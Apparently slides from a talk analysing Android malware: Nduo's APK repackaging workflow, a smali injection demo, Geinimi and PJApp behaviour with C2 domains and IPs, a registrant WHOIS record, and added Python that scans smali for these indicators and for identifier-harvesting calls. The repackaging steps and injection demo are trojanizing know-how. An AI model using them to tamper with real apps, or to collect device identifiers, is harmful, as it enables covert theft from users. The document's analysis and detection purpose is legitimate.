Malware Apk Explorer Series .2
Malware@Android
Nduo (N多)
Apks made by Nduo
How it is done
.apk
  • Unzip
.dex
  • Decompile: ApkTool[1], Dex2Jar[2]
.smali
  • Modify: Smali[4]
new.apk
  • Repack: ApkTool
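The first step of the flow above is just unzipping: an .apk is a zip archive whose bytecode sits in top-level classes.dex (and classes2.dex, ...) entries that each start with the dex magic "dex\n" plus a version. The following Python is an added example, not code from the slides or from any of the tools referenced; it builds a constructed in-memory stand-in for an APK, lists the dex entries the way an unzip step would, and refuses an entry that carries the .dex name but not the dex magic, which is the check you want before handing a file to ApkTool or Dex2Jar.

```python
import io
import zipfile

# A dex header begins with the magic "dex\n", three ASCII version digits
# and a NUL byte, e.g. b"dex\n035\0".
DEX_MAGIC = b"dex\n"


def build_sample_apk() -> bytes:
    """Constructed stand-in for an APK (no real app involved): a zip with two
    valid dex entries, a bogus classes3.dex without the magic, a nested file
    under res/ that must be ignored, and the usual manifest files."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as z:
        z.writestr("AndroidManifest.xml", b"<placeholder binary manifest>")
        z.writestr("classes.dex", b"dex\n035\0" + b"\0" * 100)
        z.writestr("classes2.dex", b"dex\n035\0" + b"\0" * 40)
        z.writestr("classes3.dex", b"this is not dex bytecode")
        z.writestr("res/raw/data.bin", b"dex\n")
        z.writestr("META-INF/MANIFEST.MF", b"Manifest-Version: 1.0\n")
    return buf.getvalue()


def list_dex_entries(apk_bytes: bytes) -> list:
    """Unzip step: names of top-level *.dex entries in archive order.
    Code lives at the archive root; res/ and META-INF/ are skipped."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        return [n for n in z.namelist() if n.endswith(".dex") and "/" not in n]


def extract_dex(apk_bytes: bytes, name: str) -> bytes:
    """Read one dex entry and refuse anything without the dex magic, so a
    renamed or corrupted file is caught before it reaches a decompiler."""
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as z:
        data = z.read(name)
    if not data.startswith(DEX_MAGIC) or len(data) < 8 or data[7] != 0:
        raise ValueError(f"{name}: not a dex file (bad magic)")
    return data


def dex_version(data: bytes) -> str:
    """The three ASCII digits after the magic, e.g. '035'."""
    return data[4:7].decode("ascii")


def triage(apk_bytes: bytes) -> dict:
    """Map each top-level dex entry to its version, or to 'INVALID'."""
    report = {}
    for name in list_dex_entries(apk_bytes):
        try:
            report[name] = dex_version(extract_dex(apk_bytes, name))
        except ValueError:
            report[name] = "INVALID"
    return report


if __name__ == "__main__":
    sample = build_sample_apk()
    for entry, ver in triage(sample).items():
        print(f"{entry}: {ver}")
```

Only the archive root is scanned on purpose: a "dex\n" prefix buried under res/ is data, not code, and a top-level classes3.dex with the wrong header is reported as INVALID rather than passed on, which is the usual way a repacked or tampered archive first shows up.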
Wet feet
AlertDialog Java code:

AlertDialog alertDialog = new AlertDialog.Builder(this).create();
alertDialog.setTitle("LALALA");
alertDialog.setMessage("You should see me!!!!!!!");
alertDialog.show();
Wet feet cont.
AlertDialog op-code (smali):

new-instance v1, Landroid/app/AlertDialog$Builder;
#v1=(UninitRef);
invoke-direct {v1, p0}, Landroid/app/AlertDialog$Builder;-><init>(Landroid/content/Context;)V
#v1=(Reference);
invoke-virtual {v1}, Landroid/app/AlertDialog$Builder;->create()Landroid/app/AlertDialog;
move-result-object v0
.local v0, alertDialog:Landroid/app/AlertDialog;
#v0=(Reference);
const-string v1, "LALALA"
invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V
const-string v1, "You should see me!!!!!!!"
invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setMessage(Ljava/lang/CharSequence;)V
invoke-virtual {v0}, Landroid/app/AlertDialog;->show()V
Wet feet cont.
Yingyonghui Java code, SplashActivity.java (op-code, with the AlertDialog op-code above inserted here):

.method public onCreate(Landroid/os/Bundle;)V
    .locals 12
    .parameter "savedInstanceState"
    .prologue
    const/16 v11, 0x400
    #v11=(PosShort);
    const/4 v10, 0x0
    #v10=(Null);
    const/4 v9, 0x1
    #v9=(One);
    invoke-super {p0, p1}, Landroid/app/Activity;->onCreate(Landroid/os/Bundle;)V
Wet feet cont.
HideFile Java code, HideFiles.java:

getPackageInfo("com.nduoa.market", 0);
("使用N多市场, \n帮助维护「%s」的更新?", …)
localBuilder2.setPositiveButton("安装 ", locald);
a.a("http://market.nduoa.com/update/nDuoaMarket.apk", str2);
i.a("KAWAHAeBUBLBaBBAMAPBRAEAIAWAMBdAKBbALAUABBCABBOAABdAQANAeABBaANAaABAOBPBTAGACBOATBDBAB");
Geinimi[6]

Geinimi cont.
www.widifu.com
www.udaore.com
www.frijd.com
www.islpast.com
www.piajesj.com
www.qoewsl.com
www.weolir.com
www.uisoa.com
www.riusdu.com
www.aiucr.com
117.135.134.185
180.168.68.34

Geinimi
• Access the user's geo-location based on coordinates given by the GPS
• Send or receive SMS messages
• Access the user's mailbox
• Read and modify the user's phonebook contacts
• Read and modify the user's browsing history
• Check running processes in memory
• Terminate legitimate running process in the device
• Install shortcuts
• Perform web queries
• Change the wallpaper of the device

Board, Brand, CPID, CPU ABI, Device, DID, Display, Fingerprint, Host, Line1 Number, Manufacturer, Model, Network Country ISO, Network Operator, Network Operator Name, Network Type, Phone Type, Product, PTID, SALESID, SDK version, Shell, SIM Country ISO, SIM Operator, SIM Operator Name, SIM Serial Number, SIM State, Software Version, Subscriber ID, Tags, Time, Type, User, Voice mail Number
PJApp 泡椒 [3][5]
"content://browser/bookmarks"
MEEGO91.COM
Channel activation (渠道激活)
IMEI / SIM / IMSI / ICCID / Pdus……
Default Browser
SEND ALL Bookmarks
ADD android.paojiao.cn, ct2.paojiao.cn, g3g3.cn
com.uc.browser, com.tencent.mtt, com.opera.mini.android, mobi.mgeek.TunnyBrowser, com.skyfire.browser, com.kolbysoft.steel, com.android.browser
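Once an .apk has been taken apart into smali (the "Wet feet" slides show what the instructions look like), the Geinimi and PJApp slides above give the things worth searching the smali for: the Geinimi hosts and IPs, the "content://browser/bookmarks" URI and the browser package names PJApp targets, and calls that read the identifiers both families collect (IMEI, IMSI, ICCID, Line1 Number). The scanner below is an added example, not code from the slides; it parses `const-string` and `invoke-*` lines, matches the string indicators listed on the slides, and flags the real TelephonyManager/SmsManager getters behind those identifiers. The smali excerpt it runs on is constructed for the example (the class `Lcom/example/Collector;` is hypothetical), and the category labels are mine.

```python
import re

# Indicator strings taken from the Geinimi and PJApp slides; labels are mine.
INDICATORS = {
    "geinimi-c2": {
        "www.widifu.com", "www.udaore.com", "www.frijd.com", "www.islpast.com",
        "www.piajesj.com", "www.qoewsl.com", "www.weolir.com", "www.uisoa.com",
        "www.riusdu.com", "www.aiucr.com", "117.135.134.185", "180.168.68.34",
    },
    "pjapp-bookmarks": {"content://browser/bookmarks"},
    "pjapp-browser-pkg": {
        "com.uc.browser", "com.tencent.mtt", "com.opera.mini.android",
        "mobi.mgeek.TunnyBrowser", "com.skyfire.browser", "com.kolbysoft.steel",
        "com.android.browser",
    },
}

# Framework methods behind the identifiers the slides list; these are the
# real TelephonyManager / SmsManager method names.
SENSITIVE_CALLS = {
    ("Landroid/telephony/TelephonyManager;", "getDeviceId"): "IMEI",
    ("Landroid/telephony/TelephonyManager;", "getSubscriberId"): "IMSI",
    ("Landroid/telephony/TelephonyManager;", "getSimSerialNumber"): "ICCID",
    ("Landroid/telephony/TelephonyManager;", "getLine1Number"): "Line1 Number",
    ("Landroid/telephony/SmsManager;", "sendTextMessage"): "send SMS",
}

# invoke-kind {regs}, Lpkg/Class;->method(desc)ret   (trailing '#...' comment stripped first)
INVOKE_RE = re.compile(
    r"^\s*invoke-[a-z]+(?:/range)?\s+\{[^}]*\},\s*(L[^;]+;)->(<init>|\w+)(\(.*?\).+)$"
)
CONST_STRING_RE = re.compile(r'^\s*const-string(?:/jumbo)?\s+[vp]\d+,\s*"((?:[^"\\]|\\.)*)"')

# Constructed smali excerpt in the slides' style (apktool-like register comments).
SAMPLE_SMALI = """\
.method private collect(Landroid/content/Context;)V
    .locals 3
    const-string v0, "content://browser/bookmarks"
    #v0=(Reference);
    invoke-virtual {p0, v0}, Lcom/example/Collector;->dumpProvider(Ljava/lang/String;)V
    invoke-virtual {v1}, Landroid/telephony/TelephonyManager;->getSubscriberId()Ljava/lang/String;
    move-result-object v2
    const-string v0, "www.widifu.com"
    const-string/jumbo v1, "com.uc.browser"
    invoke-virtual {v0, v1}, Landroid/app/AlertDialog;->setTitle(Ljava/lang/CharSequence;)V
    return-void
.end method
"""


def parse_invoke(line):
    """Split an invoke-* instruction into (class, method, descriptor); None otherwise."""
    m = INVOKE_RE.match(line.split("#", 1)[0].rstrip())
    return m.groups() if m else None


def parse_const_string(line):
    """Return the literal of a const-string / const-string/jumbo line, or None."""
    m = CONST_STRING_RE.match(line)
    return m.group(1) if m else None


def scan_smali(text):
    """Walk smali source and collect indicator strings and sensitive API calls."""
    hits = {cat: set() for cat in INDICATORS}
    hits["sensitive-api"] = set()
    for line in text.splitlines():
        s = parse_const_string(line)
        if s is not None:
            for cat, values in INDICATORS.items():
                if s in values:
                    hits[cat].add(s)
            continue
        inv = parse_invoke(line)
        if inv is not None:
            label = SENSITIVE_CALLS.get((inv[0], inv[1]))
            if label:
                hits["sensitive-api"].add(label)
    return {cat: sorted(v) for cat, v in hits.items()}


if __name__ == "__main__":
    for cat, found in scan_smali(SAMPLE_SMALI).items():
        print(f"{cat}: {found}")
```

The scan works on the smali text rather than on strings pulled from the dex string table, so the same parse_invoke helper doubles as a way to confirm, line by line, that a repacked app only contains the calls you expect (the AlertDialog.setTitle call in the excerpt is parsed but never flagged).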
MEEGO91.COM
Registrant: nduo demi
nanchang jiangxi sicA501
nanchang, jiangxi 444001
China
Registered through: GoDaddy.com
Created on: 05-Sep-10
Expires on: 05-Sep-11
Administrative Contact: demi, nduo [email protected]
jiangxi sicA501
nanchang, jiangxi 444001
China
+86.861363345678
Reference
1. http://code.google.com/p/android-apktool/
2. http://code.google.com/p/dex2jar/
3. http://www.itnews.tk/archives/4761
4. http://code.google.com/p/smali/
5. http://globalthreatcenter.com/?cat=18
6. http://blog.mylookout.com/_media/Geinimi_Trojan_Teardown.pdf
Questions?